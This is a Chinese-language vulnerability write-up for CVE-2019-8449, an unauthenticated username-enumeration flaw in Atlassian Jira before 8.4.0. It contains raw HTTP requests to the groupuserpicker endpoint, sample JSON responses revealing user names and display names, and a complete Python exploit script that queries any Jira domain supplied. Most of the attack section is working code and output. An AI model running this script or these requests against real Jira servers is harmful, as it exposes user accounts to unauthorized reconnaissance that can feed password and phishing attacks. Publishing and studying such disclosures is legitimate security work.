（CVE-2019-8449）Atlassian Jira 信息泄露漏洞
============================================

一、漏洞简介
------------

Atlassian
Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。
Atlassian Jira
8.4.0之前版本中的/rest/api/latest/groupuserpicker资源存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。

二、漏洞影响
------------

Atlassian Jira 7.12\< 受影响版本\<8.4.0

三、复现过程
------------

某JIRA站点www.0-sec.org

我以目标是虚假的情况下，www.0-sec.org没有zerosec用户进行请求

    GET /rest/api/latest/groupuserpicker?query=zerosec&maxResults=50&showAvatar=false HTTP/1.1
    Host: www.0-sec.org
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

该站点会返回一串json数据，说明找不到该用户

    {"users":{"users":[],"total":0,"header":"显示 0 匹配的用户(共 0个)"},"groups":{"header":"显示 0 个匹配的组(共 0个)","total":0,"groups":[]}}

但是当我以一个已知用户身份测试时

    GET /rest/api/latest/groupuserpicker?query=DesMond&maxResults=50&showAvatar=false HTTP/1.1
    Host: www.0-sec.org
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

会返回相应用户的一些信息

    {"users":{"users":[{"name":"Desmond","key":"Desmond","html":"Desmond(Des)-test (<strong>Desmond</strong>)","displayName":"Desmond(Des)-test"}],"total":1,"header":"显示 1 匹配的用户(共 1个)"},"groups":{"header":"显示 0 个匹配的组(共 0个)","total":0,"groups":[]}}

### poc

> CVE-2019-8449.py

    # Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration)
    # Date: 2019-09-11
    # Exploit Author: Mufeed VH
    # Vendor Homepage: https://www.atlassian.com/
    # Software Link: https://www.atlassian.com/software/jira
    # Version: 8.3.4
    # Tested on: Pop!_OS 19.10
    # CVE : CVE-2019-8449

    # CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
    # DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/
    # CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796

    #!/usr/bin/env python


    __author__  = "Mufeed VH (@mufeedvh)"

    import os
    import requests


    class CVE_2019_8449:
        def ask_for_domain(self):
            domain = raw_input("[>] Enter the domain of Jira instance: => ")
            if domain == "":
                print("\n[-] ERROR: domain is required\n")
                self.ask_for_domain()
            self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)

        def ask_for_query(self):
            self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ")
            if self.query == "":
                print("\n[-] ERROR: The query parameter is required\n")
                self.ask_for_query()    

        def exploit(self):
            self.ask_for_domain()
            self.ask_for_query()

            maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ")
            showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")
            fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ")
            projectId = raw_input("\n[>] Enter the projectId to fetch: => ")
            issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ")
            avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ")
            caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")
            excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")    

            params = {
                'query': self.query, 
                'maxResults': maxResults, 
                'showAvatar': showAvatar, 
                'fieldId': fieldId, 
                'projectId': projectId, 
                'issueTypeId': issueTypeId, 
                'avatarSize': avatarSize, 
                'caseInsensitive': caseInsensitive, 
                'excludeConnectAddons': excludeConnectAddons
            }

            send_it = requests.get(url = self.url, params = params)

            try:
                response = send_it.json()
            except:
                print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")
                print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")
                print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))
                quit()
            
            print("\n<========== RESPONSE ==========>\n")
            print(response)
            print("\n<==============================>\n")

    if __name__ == '__main__':
        os.system('cls' if os.name == 'nt' else 'clear')
        
        print('''
            ================================================
            |                                              |
            | CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 |
            |  Proof of Concept By: Mufeed VH [@mufeedvh]  |
            |                                              |
            ================================================
        ''')

        CVE_2019_8449().exploit()